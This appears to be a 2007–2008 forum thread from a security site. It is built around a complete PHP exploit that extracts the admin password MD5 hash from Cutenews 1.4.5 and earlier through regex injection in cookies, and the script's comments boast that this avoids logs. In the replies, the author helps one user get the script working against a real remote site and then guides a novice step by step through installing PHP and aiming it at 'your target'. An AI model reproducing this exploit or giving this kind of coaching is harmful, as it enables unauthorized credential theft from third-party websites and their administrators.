 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Cutenews <= 1.4.5 admin password md5 hash fetch exploit |
 |
 Posted: Sun Dec 23, 2007 10:49 pm |
 |
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
 |
|
 |
|
| Code: |
<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// Cutenews <= 1.4.5 admin password md5 hash fetching exploit
// Version 1.1
// written by Janek Vind "waraxe"
// http://www.waraxe.us
// 25. dec 2007
// Estonia, Tartu
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_COOKIE, so no log fear
// 3. Pretesting saves time if Cutenews is not vulnerable
//
// Version 1.1 -> pattern recognize improved
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file
//=====================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
$levels = array(1=>'admin',2=>'editor',3=>'journalist',4=>'commenter');
$start_time = time();
$requests = 0;
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
if(!isset($_REQUEST['wtf-is-cli']))
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Warning!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "Still, you can try to run it from webserver.<br />\n";
echo "Just press the button below and prepare for long waiting<br />\n";
echo "And learn to use php CLI next time, please ...<br />\n";
echo "<form method=\"get\">\n";
echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
echo "</form>\n";
echo "</center></body></html>\n";
exit;
}
else
{
// Let's try to maximize our chances without CLI
set_time_limit(0);
}
}
//=====================================================================
add_logline("-------------------------------------------------------");
add_logline("Cutenews password md5 hash fetching started");
add_logline("Target: $target");
add_logline("Username: $username");
pre_test();
$h = get_hash();
$run_time = time() - $start_time;
add_logline("MD5 hash: $h");
xecho("\nFinal MD5 hash: $h", 1);
xecho("\nTotal time spent: $run_time seconds", 1);
xecho("HTTP requests made: $requests\n", 1);
xecho("Questions and feedback - http://www.waraxe.us/forums.html", 1);
xecho("See ya! :)", 1);
exit;
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function get_hash()
{
$hash = '';
for($i = 0; $i < 32; $i ++)
{
xecho("Finding hash char pos $i");
$c = get_hash_char($i);
$hash .= $c;
xecho("Current hash: $hash");
}
return $hash;
}
///////////////////////////////////////////////////////////////////////
function get_hash_char($pos)
{
global $username;
$un = "^$username\$";
$charset = '0123456789abcdef';
$beg = '^';
if($pos > 0)
{
$beg .= "([a-f0-9]{{$pos}})";
}
$end = '$';
if($pos < 31)
{
$cnt = 31 - $pos;
$end = "([a-f0-9]{{$cnt}})\$";
}
for($i = 8; $i > 0; $i >>= 1)
{
$first = substr($charset, 0, $i);
$second = substr($charset, $i);
$hp = "$beg([$first])$end";
if( make_query($un, $hp) === 1)
{
xecho("Position $pos: [$first]");
$charset = $first;
}
else
{
xecho("Position $pos: [$second]");
$charset = $second;
}
}
return $charset;
}
///////////////////////////////////////////////////////////////////////
function pre_test()
{
global $username;
// Target URL valid?
xecho("Validating target URL");
if(strpos(make_get($GLOBALS['target']), 'search_in_archives') === false)
{
die('Target URL not valid!');
}
xecho("URL is valid");
$un = "^$username\$";
if( make_query($un) !== 1)
{
die('Pretest 1 failed - wrong username?');
}
else
{
xecho("Pretest 1 passed - username OK", 1);
}
$hp = '^[a-f0-9]{32}$';
if( make_query($un, $hp) !== 1)
{
die('Pretest 2 failed - target not vulnerable?');
}
else
{
xecho("Pretest 2 passed - regex injection OK", 1);
}
$hp = '^[a-f0-9]{1337}$';
if( make_query($un, $hp) !== 0)
{
die('Pretest 3 failed - target not vulnerable?');
}
else
{
xecho("Pretest 3 passed - regex injection OK", 1);
}
}
///////////////////////////////////////////////////////////////////////
function make_query($username, $hashpattern = '')
{
global $target;
$max_retries = 10;
$cookie = "dosearch=yes;files_arch[]=./data/users.db.php;title=$username";
if(!empty($hashpattern))
{
$cookie .= ";story=$hashpattern";
}
for($retry = 0; $retry < $max_retries + 1; $retry ++)
{
if($retry > 0)
{
xecho("Request failed!", 1);
xecho("Sleeping $retry seconds", 1);
sleep($retry);
xecho("Awake ...", 1);
xecho("Retry #$retry", 1);
}
$buff = make_get($target, $cookie);
$ret = preg_match('/\[[0-9]{1,6}\]:/',$buff,$hits);
if($ret > 0)
{
$ret = intval(substr($hits[0], 1));
if($ret > -1)
{
return $ret;
}
}
}
die('Fatal error - server down?');
}
///////////////////////////////////////////////////////////////////////
function make_get($url, $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
if(!empty($cookie))
{
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
$GLOBALS['requests'] ++;
return $fc;
}
//////////////////////////////////////////////////////////////////////
function add_logline($line)
{
global $outfile;
$line .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);
}
//////////////////////////////////////////////////////////////////////
function xecho($line, $both = 0)
{
if($GLOBALS['cli'])
{
echo "$line\n";
}
elseif($both)
{
$line = nl2br(htmlspecialchars($line));
echo "$line<br />\n";
}
}
/////////////////////////////////////////////////////////////////////
?>
|
Feedback is welcome  |
|
Last edited by waraxe on Mon Dec 24, 2007 11:07 pm; edited 3 times in total |
|
|
|
|
|
|
|
| Posted: Mon Dec 24, 2007 10:56 am |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
Wow waraxe you are great dude.Very nice work and stupid bug.:)God blase you.;)Merry christmas. |
|
|
|
|
| Posted: Mon Dec 24, 2007 12:18 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Merry Christmas  |
|
|
|
|
|
cant work out |
|
| Posted: Mon Dec 24, 2007 4:55 pm |
|
|
| theface |
| Active user |
 |
|
| Joined: Dec 24, 2007 |
| Posts: 33 |
|
|
|
|
|
|
|
i am running the script on windows machine. and when i try to connect to local machine it works. but when i try to connect to a remote server it gives me server timeout.
"Fatal errror - server down?"
any suggestions ? |
|
|
|
|
|
Re: cant work out |
|
| Posted: Mon Dec 24, 2007 6:00 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| theface wrote: | i am running the script on windows machine. and when i try to connect to local machine it works. but when i try to connect to a remote server it gives me server timeout.
"Fatal errror - server down?"
any suggestions ? |
This is the code fragment:
| Code: |
if( ($x !== false) && ($y !== false) && ($x < $y) ) $buff = make_get($target, $cookie);
$x = strpos($buff, '<b>Founded News articles [');
$y = strpos($buff, ']:</b>', $x + 25);
{
$buff = trim(substr($buff, $x + 26, $y - $x - 26));
$ret = intval($buff);
if( ($ret > -1) && ($ret < 2) )
{
return $ret;
}
}
}
die('Fatal errror - server down?');
|
So this error message can be little bit misguiding, sorry ...
It means, that server response does not contain "Founded News articles " pattern as expected. I tested my exploit script against many targets and it always worked. In your case this problem can be related to modified Cutenews scripts, so that output is different looking, or there are other malfunctions. I suggest you to write some debugging code right after make_get() function. Example:
| Code: |
$buff = make_get($target, $cookie);
//===========
die("Debug: $buff");
//===========
$x = strpos($buff, '<b>Founded News articles [');
$y = strpos($buff, ']:</b>', $x + 25);
|
In this way you can see in plain text details of server response, and if there is any error messages, like "cannot open file" or something like that, then feel free to post details here. Maybe i am able to help. |
|
|
|
|
|
|
|
|
| Posted: Mon Dec 24, 2007 6:18 pm |
|
|
| theface |
| Active user |
|
|
| Joined: Dec 24, 2007 |
| Posts: 33 |
|
|
|
|
|
|
|
actually i think the problem is
| Code: |
$buff = make_get($target, $cookie);
//===========
die("Debug: $buff");
//===========
$x = strpos($buff, '<b>[b]Founded News articles [/b][');
$y = strpos($buff, ']:</b>', $x + 25); |
instead of the Founded New Articles they have changed it to come in a different font i mean so its not coming with that it gives that text in another langugage.
so can that be a problem ?
" | Code: |
Debug: HTTP/1.0 200 OK Date: Mon, 24 Dec 2007 18:14:18 GMT Server: Apache Content-Type: text/html X-Cache: MISS from proxy104.rol.net.mv X-Cache-Lookup: MISS from proxy104.rol.net.mv:8080 Via: 1.0 proxy104.rol.net.mv:8080 (squid/2.6.STABLE5) Connection: close
ޚަބަރު; <------ THIS IS neWS
ޞުރުހީ <--------- THIS IS TITLE
ލިޔުންތެރިޔާ <------ THIS IS WRITER
ދުވަހުން 12345678910111213141516171819202122232425262728293031 JanFebMarAprMayJunJulAugSepOctNovDec 20032004200520062007200820092010
ދުވަހަށް 12345678910111213141516171819202122232425262728293031JanFebMarAprMayJunJulAugSepOctNovDec20032004200520062007200820092010
ކުރީގެ ޚަބަރުވެސް ހޯދާ <------ THIS IS LOOK IN ARCHIVES
އެޑްވާންސް <----- THIS IS ADVANCE
ފެނުނު އާޓިކަލް؛ [35]: |
this is what i am getting now. any suggestions?
ފެނުނު އާޓިކަލް؛ [35 <----- this is "Founded News articles [0]:" |
|
|
|
|
|
|
|
|
| Posted: Mon Dec 24, 2007 10:08 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Look like arabic shitt's. |
|
|
|
|
| Posted: Mon Dec 24, 2007 10:50 pm |
|
|
| theface |
| Active user |
|
|
| Joined: Dec 24, 2007 |
| Posts: 33 |
|
|
|
|
|
|
|
| koko wrote: | | Look like arabic shitt's. |
No its MAldivian. called Dhivehi. |
|
|
|
|
| Posted: Mon Dec 24, 2007 11:01 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
I got it work. I was making pattern recognize code more flexible.
Just look at exploits posted above - i have made changes and now its version 1.1
And of course - feedback is welcome - let me know if it works |
|
|
|
|
| Posted: Sun Jan 13, 2008 5:18 pm |
|
|
| onez |
| Regular user |
|
|
| Joined: Jan 12, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
| can i get a detailed explanation on how i can set this up and get it going... thank u |
|
|
|
|
|
|
|
|
| Posted: Sun Jan 13, 2008 9:01 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| onez wrote: | | can i get a detailed explanation on how i can set this up and get it going... thank u |
First download php for windows:
http://www.php.net/downloads.php
Maybe this version is best choice:
http://ee2.php.net/get/php-5.2.5-win32-installer.msi/from/a/mirror
Install it - now you have php in your home PC.
Next copy-paste php code from my exploit and put it in to text file "cutemd5.php". That's the exploit script in php language.
And finally - search for target. You must have url to target website's "search.php" script. Something like this:
| Code: | | http://localhost/cutenews.1.4.5/search.php |
After you have done all these preparations, come back here and let me know. And then i will explain, how to run the exploit.
Onemore thing to do - change username in script to the target's username. |
|
Last edited by waraxe on Mon Jan 14, 2008 5:59 pm; edited 2 times in total |
|
|
|
|
|
|
|
| Posted: Sun Jan 13, 2008 11:03 pm |
|
|
| onez |
| Regular user |
|
|
| Joined: Jan 12, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
i downloaded the php
i copied and pasted the code and its in a .php file
i found a target |
|
|
|
|
| Posted: Mon Jan 14, 2008 12:26 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Now edit your exploit script.
Search for this:
| Code: |
$target = 'http://localhost/cutenews.1.4.5/search.php';
|
and change to your target, example:
| Code: |
$target = 'http://www.mytarget.com/search.php';
|
Next create new text file "go.cmd" and write there "cmd".
After saving that file it's icon should look in windows like old "bat" file. It means, that this file is windows shell script file.
Now double-click on "go.cmd" to execute it.
You should see black window - command prompt.
Type "php" and look, what happens. If PATH parameter is set correctly, then you should see no error messages. If PATH is not set as needed, then error message will show up.
Please try this steps and let me know about results. |
|
|
|
|
|
|
|
|
| Posted: Mon Jan 14, 2008 12:53 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
My way.
Create new .txt file and put inside this.
| Code: | Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\cmd]
@="Open DOS here"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\cmd\command]
@="cmd.exe /k\"set path=%path%;z:\\\\tools&&cd %L\\\"" |
Rename this .txt to somename.reg.Rigth click on file>>Merge.
Next.Go to php folder.Right click on php folder "Open DOS here".This is open command prompt.Next open folder where you save your exploit.Type in prompt
example:
php.exe K:\myfolder\myexploit.php
..and press Enter |
|
|
|
|
|
|
|
|
| Posted: Mon Jan 14, 2008 1:55 pm |
|
|
| onez |
| Regular user |
|
|
| Joined: Jan 12, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
| waraxe wrote: | Now edit your exploit script.
Search for this:
| Code: |
$target = 'http://localhost/cutenews.1.4.5/search.php';
|
and change to your target, example:
| Code: |
$target = 'http://www.mytarget.com/search.php';
|
Next create new text file "go.cmd" and write there "cmd".
After saving that file it's icon should look in windows like old "bat" file. It means, that this file is windows shell script file.
Now double-click on "go.cmd" to execute it.
You should see black window - command prompt.
Type "php" and look, what happens. If PATH parameter is set correctly, then you should see no error messages. If PATH is not set as needed, then error message will show up.
Please try this steps and let me know about results. |
OK i did all that and got no error
whats the next steps |
|
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 4
Goto page 1, 2, 3, 4Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 106
Members: 0
Total: 106
